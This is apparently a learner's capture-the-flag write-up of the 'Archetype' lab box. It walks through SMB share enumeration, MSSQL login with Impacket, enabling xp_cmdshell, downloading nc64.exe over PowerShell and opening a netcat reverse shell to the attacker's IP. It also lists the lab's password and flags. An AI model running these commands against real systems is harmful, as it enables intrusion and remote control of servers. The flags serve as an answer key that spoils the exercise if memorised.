This was the first box in Tier 2 of the Starting Point. However, I am pretty sure these boxes are not starter boxes because this one was super hard and I honestly would have not finished it without the walkthrough. Since I couldn’t finish this box myself, there are going to be some missing points here and there throughout this post. I think it’s time for me to start working on the easy boxes from here and maybe come back to the tier 2 boxes later after some time. If I can solve one of those in the future, I will be happy to death and feel so much pride in myself. I believe the day will come very soon.
Which TCP port is hosting a databse server?
1433
What is the name of the non-Administrative share available over SMB?
backups
What is the password identified in the file on the SMB share?
M3g4c0rp123After I figured there was a non-administrative share called backups, I tried to connect to the share by running the following command:
smblcient -N \\\\10.129.95.187\\backups
The -N option is short for ‘No Password’
On the left tmux pane, I was able to connect to the backups share of the SMB server and download the only file prod.dtsConfig using the get command. On the right tmux pane, I opened up the downloaded file and was able to find the password inside.
What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
mssqlclient.py
But What is Impacket?
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
We can try to connect to the MSSQL server by using impacket’s mssqlclient.py script along with the following flags:
python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth
-windows-auth: this flag is specified to use Windows Authentication
Successfully authenticated to the Microsoft SQL Server
1┌──(kali㉿kali)-[~/Desktop/impacket/examples]
2└─$ python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth
3Impacket v0.12.0.dev1+20240725.125704.9f36a10e - Copyright 2023 Fortra
4
5Password:
6[*] Encryption required, switching to TLS
7[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
8[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
9[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
10[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
11[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
12[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
13[!] Press help for extra shell commands
14SQL (ARCHETYPE\sql_svc dbo@master)>What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
xp_cmdshell
What script can be used in order to search possible paths to escalate privileges on Windows hosts?
winPEASThe cheatsheet from pentestmonkey is really helpful that I found how to set up the command execution through the xp_cmdshell.
1SQL (ARCHETYPE\sql_svc dbo@master)> EXEC xp_cmdshell 'net user';
2ERROR: Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the secur
3ity configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp
4_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
5SQL (ARCHETYPE\sql_svc dbo@master)> EXEC sp_configure 'show advanced options', 1;
6[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
7SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
8SQL (ARCHETYPE\sql_svc dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
9[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
10SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
11SQL (ARCHETYPE\sql_svc dbo@master)> sp_configure;Now I managed to get a command execution. Let’s get a stable reverse shell. We will upload the nc64.exe binary to the target machine and execute an interactive cmd.exe process on our listening port.
1SQL (ARCHETYPE\sql_svc dbo@master)> xp_cmdshell "whoami"
2output
3-----------------
4archetype\sql_svc
5
6NULLLet’s download the binary and navigate to the oflder and then start the simple HTTP sever, then the netcat listener in a different tab.
python3 -m http.server 80
nc -lvnp 443
As a user archetype\sql_svc, we don’t have enough privileges to upload files in a system directory and only user Administrator can perform actions with higher privileges. We need to change the current working directory somewhere in the home directory of our user where it will be possible to write.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.14/nc64.exe -outfile nc64.exe
it was confirmed that the target machine indeed performed the request. Let’s bind the cmd.exe through the nc to our listener.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.14 443"
on the right tmux pane, I was able to capture the reverse shell through the netcat.
What file contains the administrator’s password?
ConsoleHost_history.txt 1 Directory of C:\Users\sql_svc\Desktop
2
301/20/2020 06:42 AM <DIR> .
401/20/2020 06:42 AM <DIR> ..
502/25/2020 07:37 AM 32 user.txt
6 1 File(s) 32 bytes
7 2 Dir(s) 10,716,418,048 bytes free
8
9C:\Users\sql_svc\Desktop>type user.txt
10type user.txt
113e7b102e78218e935bf3f4951fec21a3
12C:\Users\sql_svc\Desktop>On the target machine, I used powershell to download the program from my system.
Submit user flag
3e7b102e78218e935bf3f4951fec21a3
Submit root flag
b91ccec3305e98240082d4474b848528